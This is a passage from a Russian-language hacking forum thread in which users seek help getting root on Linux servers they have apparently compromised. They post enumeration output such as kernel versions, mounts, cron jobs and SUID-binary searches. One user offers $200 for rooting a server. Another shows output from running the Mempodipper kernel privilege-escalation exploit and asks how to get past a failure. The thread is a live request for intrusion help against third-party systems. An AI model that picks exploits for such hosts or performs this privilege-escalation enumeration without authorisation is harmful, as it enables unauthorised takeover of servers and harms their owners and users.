dr-xr-xr-x. 8 root root 4096 2014-10-15 04:08:41.135969938 -0400 .
dr-xr-xr-x. 22 root root 4096 2015-10-08 03:44:57.976293544 -0400 ..
lrwxrwxrwx 1 root root 14 2014-10-15 04:08:41.135969938 -0400 cpp -> ../usr/bin/cpp
drwxr-xr-x. 42 root root 4096 2014-10-14 12:23:53.729344301 -0400 firmware
drwxr-xr-x. 6 root root 4096 2014-10-13 09:33:41.365999951 -0400 kbd
dr-xr-xr-x. 4 root root 4096 2014-10-14 12:24:20.285344296 -0400 modules
drwxr-xr-x. 2 root root 4096 2013-11-22 09:06:19.000000000 -0500 security
drwxr-xr-x. 6 root root 4096 2014-10-13 09:31:54.435999970 -0400 terminfo
drwxr-xr-x. 5 root root 4096 2014-10-14 12:24:19.398344296 -0400 udev

mount

Code:
/dev/sda1 on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda8 on /home type ext4 (rw)
/dev/sda5 on /tmp type ext4 (rw)
/dev/sda6 on /usr type ext4 (rw)
/dev/sda7 on /usr/local type ext4 (rw)
/dev/sda3 on /var type ext4 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
tmpfs on /mnt/ram type tmpfs (rw,size=20m)

df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 16G 828M 15G 6% /
tmpfs 7.8G 0 7.8G 0% /dev/shm
/dev/sda8 412G 25G 367G 7% /home
/dev/sda5 16G 232M 15G 2% /tmp
/dev/sda6 16G 817M 15G 6% /usr
/dev/sda7 16G 7.6G 7.4G 51% /usr/local
/dev/sda3 60G 4.6G 52G 9% /var
tmpfs 20M 7.3M 13M 37% /mnt/ram

cat /etc/issue

Code:
CentOS release 6.5 (Final)
Kernel \r on an \m

cat /etc/crontab

Code:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

ls -la /etc/cron.d

Code:
total 20
drwxr-xr-x. 2 root root 4096 Oct 15 2014 .
drwxr-xr-x. 71 root root 4096 Oct 8 04:27 ..
-rw-r--r--. 1 root root 113 Nov 23 2013 0hourly
-rw-r--r--. 1 root root 108 Apr 7 2014 raid-check
-rw-r--r-- 1 root root 235 Aug 29 2014 sysstat

cat /etc/cron.d/0hourly

Code:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
01 * * * * root run-parts /etc/cron.hourly

cat /etc/cron.d/raid-check

Code:
# Run system wide raid-check once a week on Sunday at 1am by default
0 1 * * Sun root /usr/sbin/raid-check

cat /etc/cron.d/sysstat

Code:
# Run system activity accounting tool every 10 minutes
*/10 * * * * root /usr/lib64/sa/sa1 1 1
# 0 * * * * root /usr/lib64/sa/sa1 600 6 &
# Generate a daily summary of process accounting at 23:53
53 23 * * * root /usr/lib64/sa/sa2 -A

cat /proc/version

Code:
Linux version 2.6.32-431.29.2.el6.x86_64 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Tue Sep 9 21:36:05 UTC 2014

cat /proc/sys/vm/mmap_min_addr

Code:
4096

ls -la /etc/cron.hourly

Code:
total 12
drwxr-xr-x. 2 root root 4096 Sep 26 2011 .
drwxr-xr-x. 71 root root 4096 Oct 8 04:27 ..
-rwxr-xr-x. 1 root root 409 Nov 23 2013 0anacron

cat /etc/cron.hourly/0anacron

Code:
#!/bin/bash
# Skip excecution unless the date has changed from the previous run
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi

# Skip excecution unless AC powered
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power &> /dev/null
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-xr-x. 1 root root 10272 Nov 22 2013 /sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 34840 Nov 22 2013 /sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 77336 Apr 28 2014 /bin/mount
-rwsr-xr-x. 1 root root 40760 Sep 26 2013 /bin/ping
-rwsr-x---. 1 root fuse 27968 Dec 7 2011 /bin/fusermount
-rwsr-xr-x. 1 root root 36488 Sep 26 2013 /bin/ping6
-rwsr-xr-x. 1 root root 53472 Apr 28 2014 /bin/umount
-rwsr-xr-x. 1 root root 34904 Jun 25 2014 /bin/su
-rwsr-x--- 1 root dbus 46232 Sep 13 2012 /lib64/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root 9000 Sep 3 2014 /usr/sbin/usernetctl
---s--x--x. 1 root root 123832 Nov 22 2013 /usr/bin/sudo
-rwsr-xr-x. 1 root root 71480 Dec 7 2011 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 51784 Nov 23 2013 /usr/bin/crontab
-rwsr-xr-x. 1 root root 30768 Feb 22 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 18072 Sep 19 2013 /usr/bin/pkexec
-rws--x--x. 1 root root 20056 Apr 28 2014 /usr/bin/chsh
-rwsr-xr-x. 1 root root 66352 Dec 7 2011 /usr/bin/chage
-rwsr-xr-x. 1 root root 36144 Dec 7 2011 /usr/bin/newgrp
-rws--x--x. 1 root root 20184 Apr 28 2014 /usr/bin/chfn
-rws--x--x. 1 root root 14280 Aug 29 2014 /usr/libexec/pt_chown
-rwsr-xr-x. 1 root root 237376 Nov 22 2013 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 11080 Sep 19 2013 /usr/libexec/polkit-1/polkit-agent-helper-1

Zilt0

27.12.2015, 12:28

Ребята, помогите, даю $200, тому кто поможет с рутом, (писать в ЛС):

uname -a

Linux xxx.ru 2.6.32-504.16.2.el6.x86_64 #1 SMP Tue Mar 10 17:01:00 EDT 2015 x86_64 x86_64 x86_64 GNU/Linux

ls -la /boot

dr-xr-xr-x. 4 root root 4096 Dec 17 11:43 .

dr-xr-xr-x. 24 root root 4096 Oct 7 08:33 ..

-rw-r--r-- 1 root root 171 Mar 10 2015 .vmlinuz-2.6.32-504.16.2.el6.x86_64.hmac

-rw-r--r-- 1 root root 171 Nov 23 17:58 .vmlinuz-2.6.32-573.12.1.el6.x86_64.hmac

-rw-r--r-- 1 root root 2545609 Mar 10 2015 System.map-2.6.32-504.16.2.el6.x86_64

-rw-r--r-- 1 root root 2585672 Nov 23 17:58 System.map-2.6.32-573.12.1.el6.x86_64

-rw-r--r-- 1 root root 106313 Mar 10 2015 config-2.6.32-504.16.2.el6.x86_64

-rw-r--r-- 1 root root 107139 Nov 23 17:58 config-2.6.32-573.12.1.el6.x86_64

drwxr-xr-x. 3 root root 4096 Jan 28 2014 efi

drwxr-xr-x. 2 root root 4096 Dec 17 11:43 grub

-rw------- 1 root root 19178534 Apr 24 2015 initramfs-2.6.32-504.16.2.el6.x86_64.img

-rw------- 1 root root 24641878 Dec 17 11:43 initramfs-2.6.32-573.12.1.el6.x86_64.img

-rw-r--r-- 1 root root 200317 Mar 10 2015 symvers-2.6.32-504.16.2.el6.x86_64.gz

-rw-r--r-- 1 root root 206008 Nov 23 17:59 symvers-2.6.32-573.12.1.el6.x86_64.gz

-rwxr-xr-x 1 root root 4153296 Mar 10 2015 vmlinuz-2.6.32-504.16.2.el6.x86_64

-rwxr-xr-x 1 root root 4222736 Nov 23 17:58 vmlinuz-2.6.32-573.12.1.el6.x86_64

ls -la --full-time /lib

dr-xr-xr-x. 10 root root 4096 2015-12-14 10:25:53.059324786 +0000 .

dr-xr-xr-x. 24 root root 4096 2015-10-07 08:33:06.521146748 +0100 ..

lrwxrwxrwx 1 root root 14 2015-08-05 11:24:39.585708251 +0100 cpp -> ../usr/bin/cpp

drwxr-xr-x. 44 root root 12288 2015-12-17 11:43:13.810422798 +0000 firmware

drwxr-xr-x 3 root root 4096 2015-08-26 12:14:42.000000000 +0100 i686

drwxr-xr-x. 6 root root 4096 2014-01-28 10:26:02.526367363 +0000 kbd

-rwxr-xr-x 1 root root 141176 2015-08-26 12:40:51.000000000 +0100 ld-2.12.so

lrwxrwxrwx 1 root root 10 2015-09-29 09:57:42.229365669 +0100 ld-linux.so.2 -> ld-2.12.so

-rwxr-xr-x 1 root root 7224 2015-08-26 12:40:53.000000000 +0100 libBrokenLocale-2.12.so

lrwxrwxrwx 1 root root 23 2015-09-29 09:57:42.230365669 +0100 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so

-rwxr-xr-x 1 root root 20376 2015-08-26 12:40:51.000000000 +0100 libSegFault.so

-rwxr-xr-x 1 root root 13416 2015-08-26 12:40:53.000000000 +0100 libanl-2.12.so

lrwxrwxrwx 1 root root 14 2015-09-29 09:57:42.231365669 +0100 libanl.so.1 -> libanl-2.12.so

-rwxr-xr-x 1 root root 1902684 2015-08-26 12:40:48.000000000 +0100 libc-2.12.so

lrwxrwxrwx 1 root root 12 2015-09-29 09:57:42.307365669 +0100 libc.so.6 -> libc-2.12.so

-rwxr-xr-x 1 root root 190992 2015-08-26 12:40:52.000000000 +0100 libcidn-2.12.so

lrwxrwxrwx 1 root root 15 2015-09-29 09:57:42.314365669 +0100 libcidn.so.1 -> libcidn-2.12.so

-rwxr-xr-x 1 root root 38380 2015-08-26 12:40:49.000000000 +0100 libcrypt-2.12.so

lrwxrwxrwx 1 root root 16 2015-09-29 09:57:42.315365669 +0100 libcrypt.so.1 -> libcrypt-2.12.so

-rwxr-xr-x 1 root root 17896 2015-08-26 12:40:52.000000000 +0100 libdl-2.12.so

lrwxrwxrwx 1 root root 13 2015-09-29 09:57:42.316365669 +0100 libdl.so.2 -> libdl-2.12.so

-rw-r--r-- 1 root root 899 2015-08-10 15:34:50.000000000 +0100 libfreebl3.chk

-rwxr-xr-x 1 root root 9604 2015-08-10 15:34:49.000000000 +0100 libfreebl3.so

-rw-r--r-- 1 root root 899 2015-08-10 15:34:50.000000000 +0100 libfreeblpriv3.chk

-rwxr-xr-x 1 root root 378504 2015-08-10 15:34:49.000000000 +0100 libfreeblpriv3.so

-rwxr-xr-x 1 root root 120672 2015-06-01 12:36:01.000000000 +0100 libgcc_s-4.4.7-20120601.so.1

lrwxrwxrwx 1 root root 28 2015-12-13 11:06:00.471280730 +0000 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1

-rwxr-xr-x 1 root root 200024 2015-08-26 12:40:49.000000000 +0100 libm-2.12.so

lrwxrwxrwx 1 root root 12 2015-09-29 09:57:42.324365669 +0100 libm.so.6 -> libm-2.12.so

-rwxr-xr-x 1 root root 113912 2015-08-26 12:40:49.000000000 +0100 libnsl-2.12.so

lrwxrwxrwx 1 root root 14 2015-09-29 09:57:42.329365669 +0100 libnsl.so.1 -> libnsl-2.12.so

-rwxr-xr-x 1 root root 40200 2015-08-26 12:40:47.000000000 +0100 libnss_compat-2.12.so

lrwxrwxrwx 1 root root 21 2015-09-29 09:57:42.331365669 +0100 libnss_compat.so.2 -> libnss_compat-2.12.so

-rwxr-xr-x 1 root root 25596 2015-08-26 12:40:53.000000000 +0100 libnss_dns-2.12.so

lrwxrwxrwx 1 root root 18 2015-09-29 09:57:42.332365669 +0100 libnss_dns.so.2 -> libnss_dns-2.12.so

-rwxr-xr-x 1 root root 58708 2015-08-26 12:40:51.000000000 +0100 libnss_files-2.12.so

lrwxrwxrwx 1 root root 20 2015-09-29 09:57:42.334365669 +0100 libnss_files.so.2 -> libnss_files-2.12.so

-rwxr-xr-x 1 root root 22140 2015-08-26 12:40:53.000000000 +0100 libnss_hesiod-2.12.so

lrwxrwxrwx 1 root root 21 2015-09-29 09:57:42.335365669 +0100 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so

-rwxr-xr-x 1 root root 49712 2015-08-26 12:40:48.000000000 +0100 libnss_nis-2.12.so

lrwxrwxrwx 1 root root 18 2015-09-29 09:57:42.337365669 +0100 libnss_nis.so.2 -> libnss_nis-2.12.so

-rwxr-xr-x 1 root root 58712 2015-08-26 12:40:47.000000000 +0100 libnss_nisplus-2.12.so

lrwxrwxrwx 1 root root 22 2015-09-29 09:57:42.339365669 +0100 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so

-rwxr-xr-x 1 root root 131220 2015-08-26 12:40:48.000000000 +0100 libpthread-2.12.so

lrwxrwxrwx 1 root root 18 2015-09-29 09:57:42.345365669 +0100 libpthread.so.0 -> libpthread-2.12.so

-rwxr-xr-x 1 root root 103388 2015-08-26 12:40:47.000000000 +0100 libresolv-2.12.so

lrwxrwxrwx 1 root root 17 2015-09-29 09:57:42.349365669 +0100 libresolv.so.2 -> libresolv-2.12.so

-rwxr-xr-x 1 root root 39712 2015-08-26 12:40:51.000000000 +0100 librt-2.12.so

lrwxrwxrwx 1 root root 13 2015-09-29 09:57:42.351365669 +0100 librt.so.1 -> librt-2.12.so

-rwxr-xr-x 1 root root 31620 2015-08-26 12:40:54.000000000 +0100 libthread_db-1.0.so

lrwxrwxrwx 1 root root 19 2015-09-29 09:57:42.353365669 +0100 libthread_db.so.1 -> libthread_db-1.0.so

-rwxr-xr-x 1 root root 12792 2015-08-26 12:40:52.000000000 +0100 libutil-2.12.so

lrwxrwxrwx 1 root root 15 2015-09-29 09:57:42.353365669 +0100 libutil.so.1 -> libutil-2.12.so

lrwxrwxrwx 1 root root 13 2015-12-14 10:25:53.050324786 +0000 libz.so.1 -> libz.so.1.2.3

-rwxr-xr-x 1 root root 75384 2012-10-03 17:18:48.000000000 +0100 libz.so.1.2.3

dr-xr-xr-x. 4 root root 4096 2015-12-17 11:43:19.774422792 +0000 modules

drwxr-xr-x 3 root root 4096 2015-09-29 09:57:42.355365669 +0100 rtkaio

drwxr-xr-x. 2 root root 4096 2015-08-04 15:08:58.000000000 +0100 security

drwxr-xr-x. 6 root root 4096 2015-02-19 16:44:23.000000000 +0000 terminfo

drwxr-xr-x. 5 root root 4096 2015-12-17 11:43:09.066422802 +0000 udev

mount

/dev/sda1 on / type ext4 (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

tmpfs on /dev/shm type tmpfs (rw,noexec,size=2G)

/dev/sda3 on /tmp type ext4 (rw)

/dev/sda5 on /usr type ext4 (rw)

/dev/sda6 on /var type ext4 (rw,nosuid,noatime)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)

10.0.3.53:/home/sites on /home/sites type nfs (rw,nosuid,noatime,hard,intr,rsize=8192,wsize=8192 ,nfsvers=3,addr=10.0.3.53)

df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda1 3.9G 796M 2.9G 22% /

tmpfs 2.0G 686M 1.4G 34% /dev/shm

/dev/sda3 2.0G 216M 1.6G 12% /tmp

/dev/sda5 2.0G 1.5G 421M 79% /usr

/dev/sda6 123G 28G 89G 24% /var

10.0.3.53:/home/sites

17T 11T 5.5T 67% /home/sites

cat /etc/issue

Red Hat Enterprise Linux Server release 6.7 (Santiago)

Kernel \r on an \m

cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# | .------------- hour (0 - 23)

# | | .---------- day of month (1 - 31)

# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...

# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# | | | | |

# * * * * * user-name command to be executed

ls -la /etc/cron.d

drwxr-xr-x. 2 root root 4096 Dec 2 12:21 .

drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..

-rw-r--r-- 1 root root 113 Sep 22 12:05 0hourly

-rw-r--r-- 1 root root 363 May 21 2015 aide

-rw-r--r-- 1 root root 52 Dec 2 10:52 apache_child_catcher.cron

-rw-r--r-- 1 root root 42 Dec 2 10:52 auth_db_cache.cron

-rw-r--r-- 1 root root 112 Jan 28 2014 cache_omreport_data

-rw-r--r-- 1 root root 204 Dec 2 10:52 clear-frozen-and-old-emails-from-exim-spool.cron

-rw-r--r-- 1 root root 120 Dec 2 10:52 compress-large-logs.cron

-rw-------. 1 root root 70 Jul 30 2013 dump-and-clear-omreport-hardware-logs.cron

-rw-r--r-- 1 root root 99 Jul 15 2013 find_non_exim_spammers.cron

-rw-r--r-- 1 root root 86 Dec 2 10:52 find_spam_cmq.cron

-rw-r--r-- 1 root root 41 Dec 2 10:52 finddaemon.cron

-rw-r--r-- 1 root root 92 Dec 2 10:52 findmultiprocesses.cron

-rw-r--r-- 1 root root 514 Dec 2 10:52 half_hourly_httpd_config_update_light_and_apache_g raceful.cron

-rw-r--r-- 1 root root 51 Dec 2 10:52 halfmonthly.cron

-rw-r--r-- 1 root root 50 Jan 28 2014 hw_sys_time_sync

-rw-r--r-- 1 root root 77 Dec 2 10:52 ip_limit.cron

-rw-r--r-- 1 root root 61 May 7 2015 nat-pling.cron

-rw-r--r-- 1 root root 128 Sep 19 2014 pickup-ttys.cron

-rw------- 1 root root 134 Jan 28 2014 purge-old-tmp.cron

-rw------- 1 root root 108 May 20 2015 raid-check

-rw------- 1 root root 159 Apr 8 2015 report-spec-db-differences.cron

-rw------- 1 root root 235 Aug 4 2014 sysstat

-rw-r--r-- 1 root root 34 Dec 2 10:52 update-locate-db.cron

-rw-r--r-- 1 root root 43 Dec 2 10:52 update-user-cron.cron

-rw------- 1 root root 78 Apr 10 2014 update_shareddb_motd.cron

ls -la /etc/cron.hourly

drwxr-xr-x. 2 root root 4096 Dec 2 12:21 .

drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..

lrwxrwxrwx 1 root root 20 Dec 2 12:21 00noomkiller -> /usr/sbin/noomkiller

-rwxr-xr-x 1 root root 409 Sep 22 12:05 0anacron

lrwxrwxrwx 1 root root 35 Dec 2 12:21 0http-config-ssl-update.pl -> /usr/sbin/http-config-ssl-update.pl

lrwxrwxrwx 1 root root 37 Dec 2 12:21 0http-config-update-light.pl -> /usr/sbin/http-config-update-light.pl

lrwxrwxrwx 1 root root 39 Dec 2 12:21 0http-frozzle-config-update.pl -> /usr/sbin/http-frozzle-config-update.pl

lrwxrwxrwx 1 root root 24 Dec 2 12:21 0mysqlps-ext.pl -> /usr/sbin/mysqlps-ext.pl

lrwxrwxrwx 1 root root 31 Dec 2 12:21 1http-config-mv-log.pl -> /usr/sbin/http-config-mv-log.pl

lrwxrwxrwx 1 root root 35 Dec 2 12:21 2cache_omreport_results.sh -> /usr/sbin/cache_omreport_results.sh

lrwxrwxrwx 1 root root 30 Dec 2 12:21 3tmp-inode-cleaner.sh -> /usr/sbin/tmp-inode-cleaner.sh

lrwxrwxrwx 1 root root 34 Dec 2 12:21 delete_temp_ftp_files.pl -> /usr/sbin/delete_temp_ftp_files.pl

-rwxr-xr-x 1 root root 273 Feb 13 2015 mcelog.cron

lrwxrwxrwx 1 root root 40 Dec 2 12:21 update-exim-denied-senders.plx -> /usr/sbin/update-exim-denied-senders.plx

ls -la /etc/cron.monthly

drwxr-xr-x. 2 root root 4096 Jan 28 2014 .

drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..

-rwxr-xr-x. 1 root root 111 Oct 21 2013 readahead-monthly.cron

ls -la /etc/cron.weekly

drwxr-xr-x. 2 root root 4096 Dec 2 12:21 .

drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..

lrwxrwxrwx 1 root root 25 Dec 2 12:21 n-log-rotate.rb -> /usr/sbin/n-log-rotate.rb

cat /proc/version

Linux version 2.6.32-504.16.2.el6.x86_64 (mockbuild@x86-028.build.eng.bos.redhat.com (mailto:mockbuild@x86-028.build.eng.bos.redhat.com)) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-9) (GCC) ) #1 SMP Tue Mar 10 17:01:00 EDT 2015

cat /proc/sys/vm/mmap_min_addr

4096

ls -la /usr/bin/staprun

---s--x--- 1 root stapusr 183072 Mar 26 2015 /usr/bin/staprun

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

-rwsr-xr-x 1 root root 36488 Dec 11 2014 /bin/ping6

-rwsr-xr-x 1 root root 34904 Oct 21 14:23 /bin/su

-rwsr-xr-x 1 root root 38200 Dec 11 2014 /bin/ping

-rwsr-xr-x 1 root root 53472 Aug 11 2014 /bin/umount

-rwsr-xr-x 1 root root 77336 Aug 11 2014 /bin/mount

-rwsr-xr-x 1 root root 34840 Aug 4 15:09 /sbin/unix_chkpwd

-rwsr-xr-x 1 root root 10272 Aug 4 15:09 /sbin/pam_timestamp_check

-rwsr-xr-x 1 root root 123648 May 19 2015 /sbin/mount.nfs

-rwsr-xr-x 1 root root 68865 Jul 29 15:19 /opt/dell/srvadmin/sbin/omcliproxy

-rwsr-x--- 1 root dbus 46232 Apr 20 2015 /lib64/dbus-1/dbus-daemon-launch-helper

-rwsr-x--- 1 root support 1332 Apr 7 2014 /usr/bin/ssu

-rwsr-xr-x 1 root root 66352 Mar 27 2015 /usr/bin/chage

-rwsr-xr-x 1 root root 20888 May 26 2014 /usr/bin/rcp

-rwsr-x--- 1 root 503 8042 Apr 4 2014 /usr/bin/rshop-diff

-rws--s--x 1 _rshop apache 7873 Jun 17 2011 /usr/bin/rshop-int

-rwsr-xr-x 1 root root 30768 Nov 2 19:00 /usr/bin/passwd

-rwsr-xr-x 1 root root 22544 Mar 7 2015 /usr/bin/pkexec

-rwsr-xr-x 1 root root 51784 Sep 22 12:05 /usr/bin/crontab

-rwsr-xr-x 1 root root 15640 May 26 2014 /usr/bin/rlogin

-rwsr-x--- 1 root apache 183 Mar 28 2014 /usr/bin/kill-all-php-scripts.plx

-rwsr-xr-x 1 root root 36144 Mar 27 2015 /usr/bin/newgrp

-rws--x--x 1 root root 20056 Aug 11 2014 /usr/bin/chsh

-rws--x--x 1 _status _status 4264 Mar 14 2014 /usr/bin/system_status

-rwsr-xr-x 1 root root 59408 Apr 10 2015 /usr/bin/ksu

-rws--x--x 1 root root 69752 Oct 1 13:58 /usr/bin/sperl5.10.1

-rwsr-xr-x 1 root root 11408 May 26 2014 /usr/bin/rsh

-rws--x--x 1 root root 20184 Aug 11 2014 /usr/bin/chfn

-rwsr-xr-x 1 root root 71480 Mar 27 2015 /usr/bin/gpasswd

-rwsr-xr-x 1 root root 54496 Feb 16 2015 /usr/bin/at

---s--x--x 1 root root 123832 Jul 29 13:08 /usr/bin/sudo

---s--x--- 1 root stapusr 183072 Mar 26 2015 /usr/bin/staprun

-rwsr-x--- 1 root support 1332 Jan 29 2014 /usr/local/bin/ssu

-rws--x--x 1 _status _status 6466 Jan 29 2014 /usr/local/bin/system_status

-rwsr-xr-x 1 root root 257824 Jul 17 10:02 /usr/libexec/openssh/ssh-keysign

-rwsr-xr-x 1 root root 14368 Mar 7 2015 /usr/libexec/polkit-1/polkit-agent-helper-1

-rws--x--x 1 root root 14280 Aug 26 12:24 /usr/libexec/pt_chown

-rwsr-xr-x. 1 root root 893912 Feb 8 2013 /usr/sbin/exim

-rws--x--x. 1 root root 34048 Feb 25 2010 /usr/sbin/userhelper

-r-s--x--- 1 root apache 19992 Nov 11 11:31 /usr/sbin/suexec

-rwsr-xr-x 1 root root 9000 Nov 10 16:34 /usr/sbin/usernetctl

Filipp

30.12.2015, 01:05

Есть серв:

Linux 2.6.18-400.1.1.el5PAE #1 SMP Thu Dec 18 01:38:34 EST 2014 i686

Нашел под него сплоит (https://www.exploit-db.com/exploits/18411/), однако запускаю и вижу:

Code:
[+] Opening parent mem /proc/30870/mem in child.
[+] Sending fd 3 to parent.
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.

Смотрю я дальше su:

ls -la /bin/su

-rwsr-x--- 1 root wheel 24312 Mar 21 2012 /bin/su

И тут до меня доходит что прав на файл у меня вообще нет. Это смертельно? Может быть можно что-то сделать не задействуя su?

YaBtr

30.12.2015, 12:34

Filipp said:
↑ (https://antichat.live/posts/3933933/)
Есть серв:
Linux 2.6.18-400.1.1.el5PAE #1 SMP Thu Dec 18 01:38:34 EST 2014 i686
Нашел под него сплоит (
https://www.exploit-db.com/exploits/18411/
), однако запускаю и вижу:

Указано ведь, что mempodipper для [SIZE="2"]2.6.39

YaBtr

30.12.2015, 12:54

Vip77 said:
↑ (https://antichat.live/posts/3930770/)
Есть что под сие?
uname -a

Code:
Linux ***.com 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

ls -la /boot

Code:
total 43336
dr-xr-xr-x. 4 root root 4096 Oct 14 2014 .
dr-xr-xr-x. 22 root root 4096 Oct 8 03:44 ..
-rw-r--r--. 1 root root 171 Sep 9 2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac
-rw-r--r--. 1 root root 166 Nov 21 2013 .vmlinuz-2.6.32-431.el6.x86_64.hmac
-rw-r--r--. 1 root root 2519815 Sep 9 2014 System.map-2.6.32-431.29.2.el6.x86_64
-rw-r--r--. 1 root root 2518236 Nov 21 2013 System.map-2.6.32-431.el6.x86_64
-rw-r--r--. 1 root root 105200 Sep 9 2014 config-2.6.32-431.29.2.el6.x86_64
-rw-r--r--. 1 root root 105195 Nov 21 2013 config-2.6.32-431.el6.x86_64
drwxr-xr-x. 3 root root 4096 Oct 13 2014 efi
drwxr-xr-x. 2 root root 4096 Oct 14 2014 grub
-rw-------. 1 root root 15220904 Oct 14 2014 initramfs-2.6.32-431.29.2.el6.x86_64.img
-rw-------. 1 root root 15216205 Oct 13 2014 initramfs-2.6.32-431.el6.x86_64.img
-rw-r--r--. 1 root root 193945 Sep 9 2014 symvers-2.6.32-431.29.2.el6.x86_64.gz
-rw-r--r--. 1 root root 193758 Nov 21 2013 symvers-2.6.32-431.el6.x86_64.gz
-rwxr-xr-x. 1 root root 4131984 Sep 9 2014 vmlinuz-2.6.32-431.29.2.el6.x86_64
-rwxr-xr-x. 1 root root 4128368 Nov 21 2013 vmlinuz-2.6.32-431.el6.x86_64

ls -la --full-time /lib

Code:
total 32
dr-xr-xr-x. 8 root root 4096 2014-10-15 04:08:41.135969938 -0400 .
dr-xr-xr-x. 22 root root 4096 2015-10-08 03:44:57.976293544 -0400 ..
lrwxrwxrwx 1 root root 14 2014-10-15 04:08:41.135969938 -0400 cpp -> ../usr/bin/cpp
drwxr-xr-x. 42 root root 4096 2014-10-14 12:23:53.729344301 -0400 firmware
drwxr-xr-x. 6 root root 4096 2014-10-13 09:33:41.365999951 -0400 kbd
dr-xr-xr-x. 4 root root 4096 2014-10-14 12:24:20.285344296 -0400 modules
drwxr-xr-x. 2 root root 4096 2013-11-22 09:06:19.000000000 -0500 security
drwxr-xr-x. 6 root root 4096 2014-10-13 09:31:54.435999970 -0400 terminfo
drwxr-xr-x. 5 root root 4096 2014-10-14 12:24:19.398344296 -0400 udev

mount

Code:
/dev/sda1 on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda8 on /home type ext4 (rw)
/dev/sda5 on /tmp type ext4 (rw)
/dev/sda6 on /usr type ext4 (rw)
/dev/sda7 on /usr/local type ext4 (rw)
/dev/sda3 on /var type ext4 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
tmpfs on /mnt/ram type tmpfs (rw,size=20m)

df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 16G 828M 15G 6% /
tmpfs 7.8G 0 7.8G 0% /dev/shm
/dev/sda8 412G 25G 367G 7% /home
/dev/sda5 16G 232M 15G 2% /tmp
/dev/sda6 16G 817M 15G 6% /usr
/dev/sda7 16G 7.6G 7.4G 51% /usr/local
/dev/sda3 60G 4.6G 52G 9% /var
tmpfs 20M 7.3M 13M 37% /mnt/ram

cat /etc/issue

Code:
CentOS release 6.5 (Final)
Kernel \r on an \m

cat /etc/crontab

Code:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

ls -la /etc/cron.d

Code:
total 20
drwxr-xr-x. 2 root root 4096 Oct 15 2014 .
drwxr-xr-x. 71 root root 4096 Oct 8 04:27 ..
-rw-r--r--. 1 root root 113 Nov 23 2013 0hourly
-rw-r--r--. 1 root root 108 Apr 7 2014 raid-check
-rw-r--r-- 1 root root 235 Aug 29 2014 sysstat

cat /etc/cron.d/0hourly

Code:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
